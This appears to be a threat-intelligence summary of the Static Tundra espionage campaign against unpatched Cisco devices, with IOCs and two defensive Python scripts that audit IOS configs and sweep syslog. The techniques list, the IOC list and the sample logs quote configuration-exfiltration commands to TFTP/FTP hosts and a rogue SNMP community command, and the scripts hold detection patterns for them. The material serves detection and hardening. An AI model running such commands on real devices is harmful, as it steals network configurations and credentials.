Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices

Static Tundra is a Russian state-sponsored espionage group linked to the FSB’s Center 16. For more than a decade it has compromised unpatched and end-of-life network devices, including through the Cisco Smart Install vulnerability CVE-2018-0171, to steal device configurations and keep long-term access with implants such as SYNful Knock and bespoke SNMP tooling. It mainly targets telecommunications, higher education and manufacturing organizations across several regions. Defenders are urged to patch, disable Smart Install and harden device configurations so that ongoing exploitation is detected and stopped. #CVE-2018-0171 #SYNfulKnock

Keypoints

  • Static Tundra is assessed as a Russian state-sponsored cluster linked to FSB Center 16 and possibly related to Energetic Bear/BERSERK BEAR.
  • The group has been compromising network devices since at least 2015 and exploits the seven-year-old Cisco Smart Install vulnerability CVE-2018-0171 to extract device configurations and establish persistence.
  • Primary targets include telecom, higher education, and manufacturing organizations across North America, Asia, Africa and Europe, with intensified activity against Ukrainian and allied entities since the Russia-Ukraine war began.
  • Persistence techniques include the SYNful Knock IOS firmware implant, creation of local privileged accounts, added or compromised SNMP community strings, and GRE tunnels and NetFlow export to attacker infrastructure for traffic capture.
  • Initial access is automated via bespoke tooling leveraging public scan data (e.g., Shodan/Censys) and can include exploitation of CVE-2018-0171 or misuse of SNMP with weak community strings like “public” or “anonymous”.
  • Exfiltration methods include TFTP/FTP transfers and SNMP writes to CISCO-CONFIG-COPY-MIB that make the device copy its startup or running configuration to an attacker-controlled host; the stolen configurations reveal credentials and SNMP community strings.
  • Recommended defenses: apply the CVE-2018-0171 patch or disable Smart Install, follow Cisco hardening guidance, enforce strong credentials, use SNMPv3 instead of community strings and AAA with MFA for administrative access, monitor device logs and NetFlow, and replace end-of-life devices.
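
As an added illustration of the hardening points above (example code written for this summary, not code from the Talos report or from Cisco), the following Python script audits a Cisco IOS configuration text for the settings Static Tundra abuses: Smart Install left enabled, SNMPv1/v2c community strings (especially defaults such as "public" or "anonymous", and read-write strings with no ACL), unexpected privilege-15 local users, GRE tunnel interfaces, NetFlow export destinations, and a tftp-server line that serves the startup configuration. A weak sample configuration and a hardened counterpart are constructed inline so the audit can be run offline. The admin allow-list, the weak-string list beyond "public"/"anonymous", the assumption that only an explicit "no vstack" proves Smart Install is off, and the ACL-is-last-token parsing of the community line are the script's own assumptions; it handles the common forms of these commands only.

```python
"""Audit a Cisco IOS configuration for the weaknesses Static Tundra abuses.

Added example for this summary, not code from Talos or Cisco. Hostnames, IPs,
users and community strings in the sample configs are constructed.
"""
import re

# "public" and "anonymous" are named in the report; the rest are assumed common defaults.
WEAK_COMMUNITIES = {"public", "anonymous", "private", "cisco"}

# Constructed weak config: Smart Install not disabled, v2c communities (one RW with
# no ACL), an extra privilege-15 user, a GRE tunnel, NetFlow export, TFTP serving.
WEAK_CONFIG = """\
hostname edge-rtr-1
!
username admin privilege 15 secret 5 $1$abcd$placeholder
username svc_backup privilege 15 secret 5 $1$efgh$placeholder
!
interface Tunnel0
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.10
 tunnel mode gre ip
!
ip flow-export destination 203.0.113.10 2055
!
snmp-server community public RO
snmp-server community anonymous RW
snmp-server community Xk9fR2qw RW 10
!
tftp-server nvram:startup-config
!
end
"""

# Constructed hardened counterpart: Smart Install off, SNMPv3 authPriv only, one admin.
HARDENED_CONFIG = """\
hostname edge-rtr-1
!
no vstack
!
username admin privilege 15 secret 5 $1$abcd$placeholder
!
snmp-server group NETMON v3 priv
snmp-server user netmon NETMON v3 auth sha AUTHPASS priv aes 128 PRIVPASS
!
end
"""

USER_RE = re.compile(r"username (\S+) .*?privilege 15\b")
TUNNEL_DST_RE = re.compile(r"tunnel destination (\S+)")
FLOW_EXPORT_RE = re.compile(r"ip flow-export destination (\S+) (\d+)")


def _snmp_findings(line):
    """Parse 'snmp-server community <string> [view <v>] [RO|RW] [<acl>]'.
    Assumes the ACL, when present, is the last token (the common form)."""
    parts = line.split()
    if len(parts) < 3 or parts[:2] != ["snmp-server", "community"]:
        return []
    community, rest = parts[2], parts[3:]
    mode = "RW" if "RW" in rest else "RO"  # IOS defaults to read-only
    acl = rest[-1] if rest and rest[-1] not in ("RO", "RW") else None
    out = []
    if community.lower() in WEAK_COMMUNITIES:
        out.append(("weak_snmp_community", community))
    if mode == "RW":
        out.append(("snmp_rw_community", community))
        if acl is None:
            out.append(("snmp_rw_without_acl", community))
    return out


def audit_config(config, expected_admins=("admin",)):
    """Return (finding, detail) tuples; an empty list means nothing was flagged."""
    findings = []
    stripped = [l.strip() for l in config.splitlines()]

    # Smart Install is on by default; only an explicit 'no vstack' turns it off.
    if "no vstack" not in stripped:
        findings.append(("smart_install_enabled", "add 'no vstack' and patch CVE-2018-0171"))
    # Any community string means SNMPv1/v2c is accepted; the report recommends SNMPv3.
    if any(s.startswith("snmp-server community ") for s in stripped):
        findings.append(("snmp_v1_v2c_in_use", "replace community strings with SNMPv3 authPriv"))

    current_tunnel = None
    for s in stripped:
        findings.extend(_snmp_findings(s))
        m = USER_RE.match(s)
        if m and m.group(1) not in expected_admins:
            findings.append(("unexpected_priv15_user", m.group(1)))
        if s.startswith("interface "):
            name = s.split()[1]
            current_tunnel = name if name.startswith("Tunnel") else None
        elif s == "!":
            current_tunnel = None
        m = TUNNEL_DST_RE.match(s)
        if m and current_tunnel:
            findings.append(("gre_tunnel", f"{current_tunnel} -> {m.group(1)}"))
        m = FLOW_EXPORT_RE.match(s)
        if m:
            findings.append(("netflow_export", f"{m.group(1)}:{m.group(2)}"))
        if s.startswith("tftp-server "):
            findings.append(("tftp_server_serves_file", s.split(None, 1)[1]))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = audit_config(cfg)
        print(f"== {label}: {len(results)} finding(s)")
        for kind, detail in results:
            print(f"  {kind}: {detail}")
```

Run it against the output of "show running-config" saved to a file; a legitimate GRE tunnel or NetFlow collector will still be flagged, which is intended: the point is that every tunnel destination and export target gets compared with what the network team expects.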

MITRE Techniques

  • [T1210] Exploitation of Remote Services – Exploited CVE-2018-0171 in Cisco Smart Install to execute code or trigger reloads, then retrieved the configuration by having the device serve its startup config over TFTP (“tftp-server nvram:startup-config”).
  • [T1601.001] Modify System Image: Patch System Image – Installed the SYNful Knock modified Cisco IOS image to persist across reboots and accept specially crafted TCP SYN “magic packets”.
  • [T1046] Network Service Discovery – Used native device commands such as “show cdp neighbors” to discover additional systems within target environments.
  • [T1095] Non-Application Layer Protocol – Established GRE tunnels to redirect and capture traffic of interest to attacker-controlled infrastructure for collection.
  • [T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol – Exfiltrated configuration files with TFTP/FTP commands (e.g., “do show running-config | redirect tftp://:/conf_bckp”, “copy running-config ftp://user:pass@/output.txt”).
  • [T1110] Brute Force – Used default or guessable SNMP community strings (e.g., “public”, “anonymous”) to gain access where no credentials had been compromised beforehand.
  • [T1078] Valid Accounts – Created privileged local user accounts and additional SNMP read-write community strings to maintain long-term access.
  • [T1562] Impair Defenses – Modified the running configuration, including TACACS+ settings and access control lists, to hinder logging and evade detection.
  • [T1020] Automated Collection – Used bespoke tooling to automate exploitation, configuration extraction, and scanning of predefined target IP sets likely sourced from public scan data like Shodan or Censys.

Indicators of Compromise

  • [IP Address] Observed attacker infrastructure and activity timestamps – 185.141.24[.]222 (2023/03/23), 185.82.202[.]34 (2025/01/15 – 2025/02/28).
  • [IP Address] Additional observed infrastructure – 185.141.24[.]28 (2024/10/01 – 2025/07/03), 185.82.200[.]181 (2024/10/01 – 2024/11/15).
  • [File/Command] Configuration exfiltration commands seen – “do show running-config | redirect tftp://:/conf_bckp”, “copy running-config ftp://user:pass@/output.txt”.
  • [Service/Artifact] Persistent implant and tooling – SYNful Knock firmware implant (Cisco IOS) and use of CISCO-CONFIG-COPY-MIB for exfiltration (and bespoke SNMP tooling).
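
As an added example of the log monitoring recommended above (written for this summary, not part of the Talos report), this Python script sweeps Cisco IOS syslog for three things: any appearance of the attacker IPs listed above (the defanged "[.]" form is refanged first), configuration writes arriving via SNMP or from a VTY session outside trusted management networks, and commands captured by "archive log config" that match the configuration exfiltration and persistence patterns described on this page. The sample log lines, the hostname and the 10.20.0.0/16 trusted network are constructed; the %SYS-5-CONFIG_I and %PARSER-5-CFGLOG_LOGGEDCMD message shapes are the usual IOS forms but are assumed here, so check the regexes against the exact output of your platform.

```python
"""Sweep Cisco IOS syslog for the access, exfiltration and persistence activity
described in this summary, and match IPs against the IOC list above.

Added example, not from the Talos report. Log lines are constructed; the
%SYS-5-CONFIG_I and %PARSER-5-CFGLOG_LOGGEDCMD shapes are the usual IOS forms
but are assumed here. The trusted management network is an assumption too.
"""
import ipaddress
import re


def refang(ip):
    """Turn the defanged form used in IOC lists (185.82.202[.]34) into a real IP."""
    return ip.replace("[.]", ".")


# The four addresses from the Indicators of Compromise list above.
IOC_IPS = {refang(x) for x in (
    "185.141.24[.]222", "185.82.202[.]34", "185.141.24[.]28", "185.82.200[.]181")}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Config written through SNMP (e.g. a CISCO-CONFIG-COPY-MIB copy or a direct RW set).
CONFIG_BY_SNMP_RE = re.compile(r"%SYS-5-CONFIG_I: Configured from (\S+) by snmp")
# Config changed from an interactive session; the source IP is in parentheses.
CONFIG_BY_VTY_RE = re.compile(r"%SYS-5-CONFIG_I: Configured from console by .*\((\S+)\)")
# Commands recorded by 'archive log config' with 'notify syslog'.
LOGGED_CMD_RE = re.compile(r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(\S+)\s+logged command:(.*)$")
# Configuration pushed to a remote host: 'show ... | redirect' or a copy to tftp/ftp/scp.
EXFIL_CMD_RE = re.compile(r"(?:running|startup)-config\b.*?(?:\|\s*redirect\b|(?:tftp|ftp|scp)://)", re.I)
# Persistence mechanisms named in the report: new communities, priv-15 users, TFTP serving, GRE tunnels.
PERSIST_CMD_RE = re.compile(
    r"^(?:snmp-server community\b|username \S+ .*privilege 15\b|tftp-server\b|interface Tunnel\d)", re.I)

# Constructed sample: lines 1 and 3 carry IOC addresses, line 2 is a normal admin session,
# line 4 is a config exfiltration command, line 5 adds a RW community, line 6 is benign.
SAMPLE_SYSLOG = """\
<189>Mar 23 2023 04:12:01 edge-rtr-1 %SYS-5-CONFIG_I: Configured from 185.141.24.222 by snmp
<189>Mar 23 2023 04:15:44 edge-rtr-1 %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.20.0.7)
<189>Jan 15 2025 22:40:11 edge-rtr-1 %SYS-5-CONFIG_I: Configured from console by vty1 (185.82.202.34)
<189>Jan 15 2025 22:40:52 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup  logged command:do show running-config | redirect tftp://203.0.113.10/conf_bckp
<189>Jan 15 2025 22:41:30 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup  logged command:snmp-server community anonymous RW
<189>Jan 16 2025 09:00:02 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:interface GigabitEthernet0/1
"""


def _trusted(ip, nets):
    """True when ip parses and falls inside one of the trusted management networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in nets)


def sweep(log_text, trusted_nets=("10.20.0.0/16",)):
    """Return (line_no, alert, detail) tuples for the lines that need a look."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    alerts = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for ip in sorted(set(IPV4_RE.findall(line)) & IOC_IPS):
            alerts.append((n, "known_ioc_ip", ip))
        m = CONFIG_BY_SNMP_RE.search(line)
        if m:  # any SNMP-driven config write deserves review, whatever the source
            alerts.append((n, "config_write_via_snmp", m.group(1)))
        m = CONFIG_BY_VTY_RE.search(line)
        if m and not _trusted(m.group(1), nets):
            alerts.append((n, "config_change_from_untrusted_source", m.group(1)))
        m = LOGGED_CMD_RE.search(line)
        if m:
            user, cmd = m.group(1), m.group(2).strip()
            if EXFIL_CMD_RE.search(cmd):
                alerts.append((n, "config_exfil_command", f"{user}: {cmd}"))
            elif PERSIST_CMD_RE.search(cmd):
                alerts.append((n, "persistence_command", f"{user}: {cmd}"))
    return alerts


if __name__ == "__main__":
    for line_no, kind, detail in sweep(SAMPLE_SYSLOG):
        print(f"line {line_no}: {kind}: {detail}")
```

The command-logging alerts only work if "archive log config" with syslog notification is enabled on the device beforehand, which is one concrete reason to follow the Cisco hardening guidance before an incident rather than after it.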


Read more: https://blog.talosintelligence.com/static-tundra/